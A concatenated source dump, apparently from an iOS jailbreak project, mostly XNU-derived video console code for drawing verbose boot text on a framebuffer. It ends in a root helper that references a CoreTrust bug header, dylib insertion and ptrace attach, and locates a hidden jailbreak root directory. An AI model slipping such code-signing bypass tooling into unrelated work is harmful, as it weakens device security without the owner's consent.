kDataRotate180: x_pos = 0xFFFFFFFF - vc_progress_options.x_pos; y_pos = 0xFFFFFFFF - vc_progress_options.y_pos; break; case kDataRotate90: x_pos = 0xFFFFFFFF - vc_progress_options.y_pos; y_pos = vc_progress_options.x_pos; break; case kDataRotate270: x_pos = vc_progress_options.y_pos; y_pos = 0xFFFFFFFF - vc_progress_options.x_pos; break; } x = (uint32_t)((x_pos * (uint64_t) vinfo.v_width) / 0xFFFFFFFFULL); y = (uint32_t)((y_pos * (uint64_t) vinfo.v_height) / 0xFFFFFFFFULL); x -= (width / 2); y -= (height / 2); } else { x = (vc_progress->dx * vc_uiscale); y = (vc_progress->dy * vc_uiscale); if (1 & vc_progress->flags) { x += ((vinfo.v_width - width) / 2); y += ((vinfo.v_height - height) / 2); } } if ((x + width) > (int)vinfo.v_width) { break; } if ((y + height) > (int)vinfo.v_height) { break; } data += vc_progress_count * width * height; vc_blit_rect( x, y, 0, width, height, width, height, width, width, data, vc_saveunder, kDataAlpha | (vc_progress_angle & kDataRotate) | (vc_needsave ? kSave : 0)); vc_needsave = FALSE; clock_deadline_for_periodic_event(vc_progress_interval, mach_absolute_time(), &vc_progress_deadline); thread_call_enter_delayed(&vc_progress_call, vc_progress_deadline); }while (FALSE); } simple_unlock(&vc_progress_lock); splx(s); } /* * Generic Console (Front-End): Master Control * ------------------------------------------- */ #if defined (__i386__) || defined (__x86_64__) #include #endif static boolean_t gc_acquired = FALSE; static boolean_t gc_graphics_boot = FALSE; static boolean_t gc_desire_text = FALSE; static boolean_t gc_paused_progress; static void gc_pause( boolean_t pause, boolean_t graphics_now ) { spl_t s; s = splhigh(); VCPUTC_LOCK_LOCK(); disableConsoleOutput = (pause && !console_is_serial()); gc_enabled = (!pause && !graphics_now); VCPUTC_LOCK_UNLOCK(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (pause) { gc_paused_progress = vc_progress_enable; vc_progress_enable = FALSE; } else { vc_progress_enable = gc_paused_progress; } if (vc_progress_enable) { #if defined(XNU_TARGET_OS_OSX) if (1 & vc_progress_withmeter) { thread_call_enter_delayed(&vc_progressmeter_call, vc_progressmeter_deadline); } else #endif /* defined(XNU_TARGET_OS_OSX) */ thread_call_enter_delayed(&vc_progress_call, vc_progress_deadline); } simple_unlock(&vc_progress_lock); splx(s); } static void vc_initialize(__unused struct vc_info * vinfo_p) { #ifdef __arm__ unsigned long cnt, data16, data32; if (vinfo.v_depth == 16) { for (cnt = 0; cnt < 8; cnt++) { data32 = vc_colors[cnt][2]; data16 = (data32 & 0x0000F8) << 8; data16 |= (data32 & 0x00FC00) >> 5; data16 |= (data32 & 0xF80000) >> 19; data16 |= data16 << 16; vc_colors[cnt][1] = data16; } } #endif vinfo.v_rows = vinfo.v_height / ISO_CHAR_HEIGHT; vinfo.v_columns = vinfo.v_width / ISO_CHAR_WIDTH; vinfo.v_rowscanbytes = ((vinfo.v_depth + 7) / 8) * vinfo.v_width; vc_uiscale = vinfo.v_scale; if (vc_uiscale > kMaxProgressData) { //vc_uiscale = kMaxProgressData; } else if (!vc_uiscale) { vc_uiscale = 1; } } void initialize_prescreen(struct vc_info new_vinfo) { vm_initialized = TRUE; vinfo = new_vinfo; printf("[i] initialize_screen: b=%08llX, w=%08X, h=%08X, r=%08X, d=%08X\n", /* (BRINGUP) */ new_vinfo.v_physaddr, new_vinfo.v_width, new_vinfo.v_height, new_vinfo.v_rowbytes, new_vinfo.v_type); /* (BRINGUP) */ gc_ops.initialize = vc_initialize; gc_ops.enable = vc_enable; gc_ops.paint_char = vc_paint_char; gc_ops.scroll_down = vc_scroll_down; gc_ops.scroll_up = vc_scroll_up; gc_ops.clear_screen = vc_clear_screen; gc_ops.hide_cursor = vc_reverse_cursor; gc_ops.show_cursor = vc_reverse_cursor; gc_ops.update_color = vc_update_color; printf("[*] gc_initialize\n"); gc_initialize(&vinfo); gc_graphics_boot = TRUE; gc_desire_text = FALSE; vc_progress_options = vc_user_options; bzero(&vc_user_options, sizeof(vc_user_options)); vc_progress_white = TRUE; printf("[*] vc_progress_set\n"); vc_progress_set( TRUE /* graphics_now */, 1 /* delay */ ); printf("[*] gc_enable\n"); gc_enable( TRUE ); printf("[√] acquired gc\n"); gc_acquired = TRUE; } void initialize_screen(PE_Video * boot_vinfo, unsigned int op) { unsigned int newMapSize = 0; vm_offset_t newVideoVirt = 0; boolean_t graphics_now; uint32_t delay; if (boot_vinfo) { struct vc_info new_vinfo = vinfo; boolean_t makeMapping = FALSE; /* * Copy parameters */ if (kPEBaseAddressChange != op) { new_vinfo.v_width = (unsigned int)boot_vinfo->v_width; new_vinfo.v_height = (unsigned int)boot_vinfo->v_height; new_vinfo.v_depth = (unsigned int)boot_vinfo->v_depth; new_vinfo.v_rowbytes = (unsigned int)boot_vinfo->v_rowBytes; //if (kernel_map == VM_MAP_NULL) { // only booter supplies HW rotation new_vinfo.v_rotate = (unsigned int)boot_vinfo->v_rotate; //} #if defined(__i386__) || defined(__x86_64__) new_vinfo.v_type = (unsigned int)boot_vinfo->v_display; #else new_vinfo.v_type = 0; #endif unsigned int scale = (unsigned int)boot_vinfo->v_scale; if (scale == kPEScaleFactor1x) { new_vinfo.v_scale = kPEScaleFactor1x; } else if (scale == kPEScaleFactor2x) { new_vinfo.v_scale = kPEScaleFactor2x; } else { /* Scale factor not set, default to 1x */ new_vinfo.v_scale = kPEScaleFactor1x; } } new_vinfo.v_name[0] = 0; new_vinfo.v_physaddr = 0; /* * Check if we are have to map the framebuffer * If VM is up, we are given a virtual address, unless b0 is set to indicate physical. */ newVideoVirt = boot_vinfo->v_baseAddr; makeMapping = 1; //(kernel_map == VM_MAP_NULL) || (0 != (1 & newVideoVirt)); if (makeMapping) { newVideoVirt = 0; new_vinfo.v_physaddr = boot_vinfo->v_baseAddr & ~3UL; /* Get the physical address */ #ifndef __LP64__ new_vinfo.v_physaddr |= (((uint64_t) boot_vinfo->v_baseAddrHigh) << 32); #endif printf("initialize_screen: b=%08llX, w=%08X, h=%08X, r=%08X, d=%08X\n", /* (BRINGUP) */ new_vinfo.v_physaddr, new_vinfo.v_width, new_vinfo.v_height, new_vinfo.v_rowbytes, new_vinfo.v_type); /* (BRINGUP) */ } if (!newVideoVirt && !new_vinfo.v_physaddr) { /* Check to see if we have a framebuffer */ printf("initialize_screen: No video - forcing serial mode\n"); /* (BRINGUP) */ new_vinfo.v_depth = 0; /* vc routines are nop */ (void)switch_to_serial_console(); /* Switch into serial mode */ gc_graphics_boot = FALSE; /* Say we are not in graphics mode */ disableConsoleOutput = FALSE; /* Allow printfs to happen */ gc_acquired = TRUE; } else { if (makeMapping) { unsigned int flags = 0; //VM_WIMG_IO; if (boot_vinfo->v_length != 0) { newMapSize = (unsigned int) round_page(boot_vinfo->v_length); } else { newMapSize = (unsigned int) round_page(new_vinfo.v_height * new_vinfo.v_rowbytes); /* Remember size */ } abort(); // TODO //newVideoVirt = io_map_spec((vm_map_offset_t)new_vinfo.v_physaddr, newMapSize, flags); /* Allocate address space for framebuffer */ } new_vinfo.v_baseaddr = newVideoVirt + boot_vinfo->v_offset; /* Set the new framebuffer address */ } #if defined(__x86_64__) // Adjust the video buffer pointer to point to where it is in high virtual (above the hole) new_vinfo.v_baseaddr |= (VM_MIN_KERNEL_ADDRESS & ~LOW_4GB_MASK); #endif /* Update the vinfo structure atomically with respect to the vc_progress task if running */ if (vc_progress) { simple_lock(&vc_progress_lock, LCK_GRP_NULL); vinfo = new_vinfo; simple_unlock(&vc_progress_lock); } else { vinfo = new_vinfo; } if (kPEBaseAddressChange != op) { // Graphics mode setup by the booter. gc_ops.initialize = vc_initialize; gc_ops.enable = vc_enable; gc_ops.paint_char = vc_paint_char; gc_ops.scroll_down = vc_scroll_down; gc_ops.scroll_up = vc_scroll_up; gc_ops.clear_screen = vc_clear_screen; gc_ops.hide_cursor = vc_reverse_cursor; gc_ops.show_cursor = vc_reverse_cursor; gc_ops.update_color = vc_update_color; gc_initialize(&vinfo); } } graphics_now = gc_graphics_boot && !gc_desire_text; switch (op) { case kPEGraphicsMode: gc_graphics_boot = TRUE; gc_desire_text = FALSE; break; case kPETextMode: gc_graphics_boot = FALSE; break; case kPEAcquireScreen: if (gc_acquired) { break; } vc_progress_options = vc_user_options; bzero(&vc_user_options, sizeof(vc_user_options)); if (kVCAcquireImmediate & vc_progress_options.options) { delay = 0; } else if (kVCDarkReboot & vc_progress_options.options) { delay = 120; } else { delay = vc_acquire_delay; } if (kVCDarkBackground & vc_progress_options.options) { vc_progress_white = TRUE; } else if (kVCLightBackground & vc_progress_options.options) { vc_progress_white = FALSE; } #if !defined(XNU_TARGET_OS_BRIDGE) vc_progress_set( graphics_now, delay ); #endif /* !defined(XNU_TARGET_OS_BRIDGE) */ gc_enable( !graphics_now ); gc_acquired = TRUE; gc_desire_text = FALSE; break; case kPEDisableScreen: if (gc_acquired) { gc_pause( TRUE, graphics_now ); } break; case kPEEnableScreen: if (gc_acquired) { gc_pause( FALSE, graphics_now ); } break; case kPETextScreen: if (console_is_serial()) { break; } if (gc_acquired == FALSE) { gc_desire_text = TRUE; break; } if (gc_graphics_boot == FALSE) { break; } vc_progress_set( FALSE, 0 ); #if defined(XNU_TARGET_OS_OSX) vc_enable_progressmeter( FALSE ); #endif gc_enable( TRUE ); break; case kPEReleaseScreen: gc_acquired = FALSE; gc_desire_text = FALSE; gc_enable( FALSE ); if (gc_graphics_boot == FALSE) { break; } vc_progress_set( FALSE, 0 ); vc_acquire_delay = kProgressReacquireDelay; vc_progress_white = TRUE; #if defined(XNU_TARGET_OS_OSX) vc_enable_progressmeter(FALSE); vc_progress_withmeter &= ~1; #endif vc_clut8 = NULL; break; #if defined(__x86_64__) case kPERefreshBootGraphics: { spl_t s; boolean_t save; if (kBootArgsFlagBlack & ((boot_args *) PE_state.bootArgs)->flags) { break; } save = vc_progress_white; vc_progress_white = (0 != (kBootArgsFlagBlackBg & ((boot_args *) PE_state.bootArgs)->flags)); internal_enable_progressmeter(kProgressMeterKernel); s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); vc_progressmeter_drawn = 0; internal_set_progressmeter(vc_progressmeter_range(vc_progressmeter_count >> 13)); simple_unlock(&vc_progress_lock); splx(s); internal_enable_progressmeter(kProgressMeterOff); vc_progress_white = save; } #endif } } void vcattach(void); /* XXX gcc 4 warning cleanup */ void vcattach(void) { vm_initialized = TRUE; #if defined(CONFIG_VC_PROGRESS_METER_SUPPORT) const boot_args * bootargs = (typeof(bootargs))PE_state.bootArgs; PE_parse_boot_argn("meter", &vc_progress_withmeter, sizeof(vc_progress_withmeter)); #if defined(__x86_64__) vc_progress_white = (0 != ((kBootArgsFlagBlackBg | kBootArgsFlagLoginUI) & bootargs->flags)); if (kBootArgsFlagInstallUI & bootargs->flags) { vc_progress_meter_start = (bootargs->bootProgressMeterStart * kProgressMeterMax) / 65535; vc_progress_meter_end = (bootargs->bootProgressMeterEnd * kProgressMeterMax) / 65535; } else { vc_progress_meter_start = 0; vc_progress_meter_end = kProgressMeterEnd; } #else vc_progress_meter_start = 0; vc_progress_meter_end = kProgressMeterEnd; #endif /* defined(__x86_64__ */ #endif /* defined(CONFIG_VC_PROGRESS_METER_SUPPORT) */ simple_lock_init(&vc_progress_lock, 0); // will never reach this /* if (gc_graphics_boot == FALSE) { long index; if (gc_acquired) { initialize_screen(NULL, kPEReleaseScreen); } initialize_screen(NULL, kPEAcquireScreen); for (index = 0; index < msgbufp->msg_bufx; index++) { if (msgbufp->msg_bufc[index] == '\0') { continue; } vcputc( 0, 0, msgbufp->msg_bufc[index] ); if (msgbufp->msg_bufc[index] == '\n') { vcputc( 0, 0, '\r' ); } } } */ } #if defined(XNU_TARGET_OS_OSX) // redraw progress meter between pixels start, end, position at pos, // options (including rotation) passed in flags static void vc_draw_progress_meter(unsigned int flags, int start, int end, int pos) { const unsigned char *data; int i, width, bx, srcRow, backRow; int rectX, rectY, rectW, rectH; int endCapPos, endCapStart; int barWidth = kProgressBarWidth * vc_uiscale; int barHeight = kProgressBarHeight * vc_uiscale; int capWidth = kProgressBarCapWidth * vc_uiscale; // 1 rounded fill, 0 square end int style = (0 == (2 & vc_progress_withmeter)); // 1 white, 0 greyed out int onoff; for (i = start; i < end; i += width) { onoff = (i < pos); endCapPos = ((style && onoff) ? pos : barWidth); endCapStart = endCapPos - capWidth; if (flags & kDataBack) { // restore back bits width = end;// loop done after this iteration data = NULL; srcRow = 0; } else if (i < capWidth) { // drawing the left cap width = (end < capWidth) ? (end - i) : (capWidth - i); data = progressmeter_leftcap[vc_uiscale >= 2][onoff]; data += i; srcRow = capWidth; } else if (i < endCapStart) { // drawing the middle width = (end < endCapStart) ? (end - i) : (endCapStart - i); data = progressmeter_middle[vc_uiscale >= 2][onoff]; srcRow = 1; } else { // drawing the right cap width = endCapPos - i; data = progressmeter_rightcap[vc_uiscale >= 2][onoff]; data += i - endCapStart; srcRow = capWidth; } switch (flags & kDataRotate) { case kDataRotate90: // left middle, bar goes down rectW = barHeight; rectH = width; rectX = ((vinfo.v_width / 3) - (barHeight / 2)); rectY = ((vinfo.v_height - barWidth) / 2) + i; bx = i * barHeight; backRow = barHeight; break; case kDataRotate180: // middle upper, bar goes left rectW = width; rectH = barHeight; rectX = ((vinfo.v_width - barWidth) / 2) + barWidth - width - i; rectY = (vinfo.v_height / 3) - (barHeight / 2); bx = barWidth - width - i; backRow = barWidth; break; case kDataRotate270: // right middle, bar goes up rectW = barHeight; rectH = width; rectX = (vinfo.v_width - (vinfo.v_width / 3) - (barHeight / 2)); rectY = ((vinfo.v_height - barWidth) / 2) + barWidth - width - i; bx = (barWidth - width - i) * barHeight; backRow = barHeight; break; default: case kDataRotate0: // middle lower, bar goes right rectW = width; rectH = barHeight; rectX = ((vinfo.v_width - barWidth) / 2) + i; rectY = vinfo.v_height - (vinfo.v_height / 3) - (barHeight / 2); bx = i; backRow = barWidth; break; } vc_blit_rect(rectX, rectY, bx, rectW, rectH, width, barHeight, srcRow, backRow, data, vc_progressmeter_backbuffer, flags); } } extern void IORecordProgressBackbuffer(void * buffer, size_t size, uint32_t theme); static void internal_enable_progressmeter(int new_value) { spl_t s; void * new_buffer; boolean_t stashBackbuffer; int flags = vinfo.v_rotate; stashBackbuffer = FALSE; new_buffer = NULL; if (new_value) { new_buffer = kheap_alloc(KHEAP_DATA_BUFFERS, (kProgressBarWidth * vc_uiscale) * (kProgressBarHeight * vc_uiscale) * sizeof(int), Z_WAITOK); } s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (kProgressMeterUser == new_value) { if (gc_enabled || !gc_acquired || !gc_graphics_boot) { new_value = vc_progressmeter_enable; } } if (new_value != vc_progressmeter_enable) { if (new_value) { if (kProgressMeterOff == vc_progressmeter_enable) { vc_progressmeter_backbuffer = new_buffer; vc_draw_progress_meter(kDataAlpha | kSave | flags, 0, (kProgressBarWidth * vc_uiscale), 0); new_buffer = NULL; vc_progressmeter_drawn = 0; } vc_progressmeter_enable = new_value; } else if (vc_progressmeter_backbuffer) { if (kProgressMeterUser == vc_progressmeter_enable) { vc_draw_progress_meter(kDataBack | flags, 0, (kProgressBarWidth * vc_uiscale), vc_progressmeter_drawn); } else { stashBackbuffer = TRUE; } new_buffer = vc_progressmeter_backbuffer; vc_progressmeter_backbuffer = NULL; vc_progressmeter_enable = FALSE; } } simple_unlock(&vc_progress_lock); splx(s); if (new_buffer) { if (stashBackbuffer) { IORecordProgressBackbuffer(new_buffer, (kProgressBarWidth * vc_uiscale) * (kProgressBarHeight * vc_uiscale) * sizeof(int), vc_progress_white); } kheap_free(KHEAP_DATA_BUFFERS, new_buffer, (kProgressBarWidth * vc_uiscale) * (kProgressBarHeight * vc_uiscale) * sizeof(int)); } } static void internal_set_progressmeter(int new_value) { int x1, x3; int capRedraw; // 1 rounded fill, 0 square end int style = (0 == (2 & vc_progress_withmeter)); int flags = kDataAlpha | vinfo.v_rotate; if ((new_value < 0) || (new_value > kProgressMeterMax)) { return; } if (vc_progressmeter_enable) { vc_progressmeter_value = new_value; capRedraw = (style ? (kProgressBarCapWidth * vc_uiscale) : 0); x3 = (((kProgressBarWidth * vc_uiscale) - 2 * capRedraw) * vc_progressmeter_value) / kProgressMeterMax; x3 += (2 * capRedraw); if (x3 > vc_progressmeter_drawn) { x1 = capRedraw; if (x1 > vc_progressmeter_drawn) { x1 = vc_progressmeter_drawn; } vc_draw_progress_meter(flags, vc_progressmeter_drawn - x1, x3, x3); } else { vc_draw_progress_meter(flags, x3 - capRedraw, vc_progressmeter_drawn, x3); } vc_progressmeter_drawn = x3; } } void vc_enable_progressmeter(int new_value) { internal_enable_progressmeter(new_value ? kProgressMeterUser : kProgressMeterOff); } void vc_set_progressmeter(int new_value) { spl_t s; s = splhigh(); simple_lock(&vc_progress_lock, LCK_GRP_NULL); if (vc_progressmeter_enable) { if (kProgressMeterKernel != vc_progressmeter_enable) { internal_set_progressmeter(new_value); } } else { vc_progressmeter_value = new_value; } simple_unlock(&vc_progress_lock); splx(s); } #endif /* defined(XNU_TARGET_OS_OSX) */ ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/video_console.h ================================================ /* * Copyright (c) 2000-2005 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ /* * @OSF_COPYRIGHT@ */ /* * @APPLE_FREE_COPYRIGHT@ */ #ifndef _VIDEO_CONSOLE_H_ #define _VIDEO_CONSOLE_H_ #include #ifdef __cplusplus extern "C" { #endif #define kVCSysctlProgressOptions "kern.progressoptions" #define kVCSysctlConsoleOptions "kern.consoleoptions" #define kVCSysctlProgressMeterEnable "kern.progressmeterenable" #define kVCSysctlProgressMeter "kern.progressmeter" enum{ kVCDarkReboot = 0x00000001, kVCAcquireImmediate = 0x00000002, kVCUsePosition = 0x00000004, kVCDarkBackground = 0x00000008, kVCLightBackground = 0x00000010, }; enum { kDataRotate0 = 0, kDataRotate90 = 1, kDataRotate180 = 2, kDataRotate270 = 3 }; struct vc_progress_user_options { uint32_t options; // fractional position of middle of spinner 0 (0.0) - 0xFFFFFFFF (1.0) uint32_t x_pos; uint32_t y_pos; uint32_t resv[8]; }; typedef struct vc_progress_user_options vc_progress_user_options; // #if XNU_KERNEL_PRIVATE void vcputc(int, int, int); int vcgetc( int l, int u, boolean_t wait, boolean_t raw ); void video_scroll_up( void *start, void *end, void *dest ); void video_scroll_down( void *start, /* HIGH addr */ void *end, /* LOW addr */ void *dest ); /* HIGH addr */ struct vc_info { unsigned int v_height; /* pixels */ unsigned int v_width; /* pixels */ unsigned int v_depth; unsigned int v_rowbytes; unsigned long v_baseaddr; unsigned int v_type; char v_name[32]; uint64_t v_physaddr; unsigned int v_rows; /* characters */ unsigned int v_columns; /* characters */ unsigned int v_rowscanbytes; /* Actualy number of bytes used for display per row*/ unsigned int v_scale; unsigned int v_rotate; unsigned int v_reserved[3]; }; struct vc_progress_element { unsigned int version; unsigned int flags; unsigned int time; unsigned char count; unsigned char res[3]; int width; int height; int dx; int dy; int transparent; unsigned int res2[3]; }; typedef struct vc_progress_element vc_progress_element; extern struct vc_progress_user_options vc_user_options; void vc_progress_initialize( vc_progress_element * desc, const unsigned char * data1x, const unsigned char * data2x, const unsigned char * data3x, const unsigned char * clut ); void vc_progress_set(boolean_t enable, uint32_t vc_delay); void vc_display_icon( vc_progress_element * desc, const unsigned char * data ); int vc_display_lzss_icon(uint32_t dst_x, uint32_t dst_y, uint32_t image_width, uint32_t image_height, const uint8_t *compressed_image, uint32_t compressed_size, const uint8_t *clut); #if defined(XNU_TARGET_OS_OSX) extern void vc_enable_progressmeter(int new_value); extern void vc_set_progressmeter(int new_value); extern int vc_progressmeter_enable; extern int vc_progressmeter_value; extern void vc_progress_setdiskspeed(uint32_t speed); #endif /* defined(XNU_TARGET_OS_OSX) */ // #endif /* XNU_KERNEL_PRIVATE */ #ifdef __cplusplus } #endif #endif /* _VIDEO_CONSOLE_H_ */ ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/console/video_scroll.c ================================================ /* * Copyright (c) 2007 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * * This file contains Original Code and/or Modifications of Original Code * as defined in and that are subject to the Apple Public Source License * Version 2.0 (the 'License'). You may not use this file except in * compliance with the License. The rights granted to you under the License * may not be used to create, or enable the creation or redistribution of, * unlawful or unlicensed copies of an Apple operating system, or to * circumvent, violate, or enable the circumvention or violation of, any * terms of an Apple operating system software license agreement. * * Please obtain a copy of the License at * http://www.opensource.apple.com/apsl/ and read it before using this file. * * The Original Code and all software distributed under the License are * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. * Please see the License for the specific language governing rights and * limitations under the License. * * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ */ #include #include "video_console.h" void video_scroll_up(void * start, void * end, void * dest) { bcopy(start, dest, ((char *)end - (char *)start) << 2); } void video_scroll_down(void * start, /* HIGH addr */ void * end, /* LOW addr */ void * dest) /* HIGH addr */ { bcopy(end, dest, ((char *)start - (char *)end) << 2); } ================================================ FILE: RootHelperSample/launchdshim/launchdhook/verbose/verbose_boot.m ================================================ #import #include #import #import #import #import #import "IOMobileFramebuffer.h" #include #include #include #include #include "console/video_console.c" //void IOMobileFramebufferSwapDirtyRegion(IOMobileFramebufferRef conn); IOMobileFramebufferRef fbConn; IOSurfaceRef surface, oldSurface; pthread_t logger; // int pfd[2]; // void initialize_prescreen(struct vc_info vinfo); void initFramebuffer() { CGContextRef context; printf("[*] Connection init\n"); printf("[*] size variable init\n"); IOMobileFramebufferDisplaySize size; printf("[*] getting main display\n"); IOMobileFramebufferGetMainDisplay(&fbConn); printf("[*] getting display size\n"); IOMobileFramebufferGetDisplaySize(fbConn, &size); printf("[i] found size %f*%f\n", size.height, size.width); printf("[*] getting iosurface\n"); NSDictionary *properties = @{ (id)kIOSurfaceIsGlobal: @(NO), (id)kIOSurfaceWidth: @(size.width), (id)kIOSurfaceHeight: @(size.height), (id)kIOSurfacePixelFormat: @((uint32_t)'BGRA'), (id)kIOSurfaceBytesPerElement: @(4) }; surface = IOSurfaceCreate((__bridge CFDictionaryRef)properties); //IOMobileFramebufferGetLayerDefaultSurface //IOMobileFramebufferCopyLayerDisplayedSurface(fbConn, 0, &surface); printf("[i] got surface %p\n", surface); printf("[*] vinfo setup\n"); struct vc_info vinfo; vinfo.v_width = IOSurfaceGetWidth(surface); vinfo.v_height = IOSurfaceGetHeight(surface); vinfo.v_depth = 32; // 16, 32? vinfo.v_type = 0; vinfo.v_scale = 2; //kPEScaleFactor2x; vinfo.v_name[0] = 0; vinfo.v_rowbytes = IOSurfaceGetBytesPerRow(surface); vinfo.v_baseaddr = (unsigned long)IOSurfaceGetBaseAddress(surface); printf("[*] initializing\n"); IOSurfaceLock(surface, 0, nil); //memset((void *)vinfo.v_baseaddr, 0xFFFFFFFF, vinfo.v_width * vinfo.v_height); initialize_prescreen(vinfo); IOSurfaceUnlock(surface, 0, 0); printf("[√] PTR %p\n", IOSurfaceGetBaseAddress(surface)); int token; CGRect frame = CGRectMake(0, 0, vinfo.v_width, vinfo.v_height); IOMobileFramebufferSwapBegin(fbConn, &token); IOMobileFramebufferSwapSetLayer(fbConn, 0, surface, frame, frame, 0); IOMobileFramebufferSwapEnd(fbConn); } void printText(char *str) { //CGRect frame = CGRectMake(0, 0, IOSurfaceGetWidth(surface), IOSurfaceGetHeight(surface)); for (int i = 0; str[i]; i++) { //IOSurfaceLock(surface, 0, nil); char c = str[i]; vcputc(0, 0, c); if (c == '\n' || !str[i+1]) { vcputc(0, 0, '\r'); //IOSurfaceUnlock(surface, 0, 0); //IOMobileFramebufferSwapBegin(fbConn, NULL); //IOMobileFramebufferSwapSetLayer(fbConn, 0, surface, frame, frame); //IOMobileFramebufferSwapEnd(fbConn); } } } pthread_t logger; int pfd[2]; static void *logger_thread() { initFramebuffer(); CGRect frame = CGRectMake(0, 0, IOSurfaceGetWidth(surface), IOSurfaceGetHeight(surface)); setvbuf(stdout, 0, _IOLBF, 0); setvbuf(stderr, 0, _IONBF, 0); pipe(pfd); dup2(pfd[1], 1); dup2(pfd[1], 2); //ssize_t rsize; char c; uint8_t linesPrinted = 0; while (read(pfd[0], &c, 1) > 0) { vcputc(0, 0, c); if (c == '\n') { vcputc(0, 0, '\r'); static int lines = 0; if (lines++ > 100) return NULL; CGRect frame = CGRectMake(0, 0, vinfo.v_width, vinfo.v_height); IOMobileFramebufferSwapBegin(fbConn, NULL); IOMobileFramebufferSwapSetLayer(fbConn, 0, surface, frame, frame, 0); IOMobileFramebufferSwapEnd(fbConn); } } return NULL; } void initVerboseFramebuffer() { pthread_create(&logger, 0, logger_thread, 0); pthread_detach(logger); for (int i = 0; i < 4; i++) { printf(" \n"); } printf("Done: initVerboseFramebuffer\n"); } ================================================ FILE: RootHelperSample/main.m ================================================ #import @import Foundation; #import #import #import #import #import "TSUtil.h" #import #import #import #import "codesign.h" #import "coretrust_bug.h" #import #import #import #import #include #include "insert_dylib.h" /* Attach to a process that is already running. */ //PTRACE_ATTACH = 16, #define PT_ATTACH 16 /* Detach from a process attached to with PTRACE_ATTACH. */ //PTRACE_DETACH = 17, #define PT_DETACH 17 #define PT_ATTACHEXC 14 /* attach to running process with signal exception */ #define PT_TRACE_ME 0 int ptrace(int, pid_t, caddr_t, int); #define JB_ROOT_PREFIX ".jbroot-" #define JB_RAND_LENGTH (sizeof(uint64_t)*sizeof(char)*2) int is_jbrand_value(uint64_t value) { uint8_t check = value>>8 ^ value >> 16 ^ value>>24 ^ value>>32 ^ value>>40 ^ value>>48 ^ value>>56; return check == (uint8_t)value; } int is_jbroot_name(const char* name) { if(strlen(name) != (sizeof(JB_ROOT_PREFIX)-1+JB_RAND_LENGTH)) return 0; if(strncmp(name, JB_ROOT_PREFIX, sizeof(JB_ROOT_PREFIX)-1) != 0) return 0; char* endp=NULL; uint64_t value = strtoull(name+sizeof(JB_ROOT_PREFIX)-1, &endp, 16); if(!endp || *endp!='\0') return 0; if(!is_jbrand_value(value)) return 0; return 1; } uint64_t resolve_jbrand_value(const char* name) { if(strlen(name) != (sizeof(JB_ROOT_PREFIX)-1+JB_RAND_LENGTH)) return 0; if(strncmp(name, JB_ROOT_PREFIX, sizeof(JB_ROOT_PREFIX)-1) != 0) return 0; char* endp=NULL; uint64_t value = strtoull(name+sizeof(JB_ROOT_PREFIX)-1, &endp, 16); if(!endp || *endp!='\0') return 0; if(!is_jbrand_value(value)) return 0; return value; } NSString* find_jbroot() { //jbroot path may change when re-randomize it NSString * jbroot = nil; NSArray *subItems = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:@"/var/containers/Bundle/Application/" error:nil]; for (NSString *subItem in subItems) { if (is_jbroot_name(subItem.UTF8String)) { NSString* path = [@"/var/containers/Bundle/Application/" stringByAppendingPathComponent:subItem]; jbroot = path; break; } } return jbroot; } NSString *jbroot(NSString *path) { NSString* jbroot = find_jbroot(); return [jbroot stringByAppendingPathComponent:path]; } NSString* usprebooterPath() { NSError* mcmError; MCMAppContainer* appContainer = [MCMAppContainer containerWithIdentifier:@"pisshill.usprebooter" createIfNecessary:NO existed:NULL error:&mcmError]; if(!appContainer) return nil; return appContainer.url.path; } NSString* usprebooterappPath() { return [usprebooterPath() stringByAppendingPathComponent:@"usprebooter.app"]; } //BOOL isLdidInstalled(void) //{ // NSString* ldidPath = [trollStoreAppPath() stringByAppendingPathComponent:@"ldid"]; // return [[NSFileManager defaultManager] fileExistsAtPath:ldidPath]; //} int runLdid(NSArray* args, NSString** output, NSString** errorOutput) { NSString* ldidPath = [usprebooterappPath() stringByAppendingPathComponent:@"ldid"]; NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; [argsM insertObject:ldidPath.lastPathComponent atIndex:0]; NSUInteger argCount = [argsM count]; char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); for (NSUInteger i = 0; i < argCount; i++) { argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); } argsC[argCount] = NULL; posix_spawn_file_actions_t action; posix_spawn_file_actions_init(&action); int outErr[2]; pipe(outErr); posix_spawn_file_actions_adddup2(&action, outErr[1], STDERR_FILENO); posix_spawn_file_actions_addclose(&action, outErr[0]); int out[2]; pipe(out); posix_spawn_file_actions_adddup2(&action, out[1], STDOUT_FILENO); posix_spawn_file_actions_addclose(&action, out[0]); pid_t task_pid; int status = -200; int spawnError = 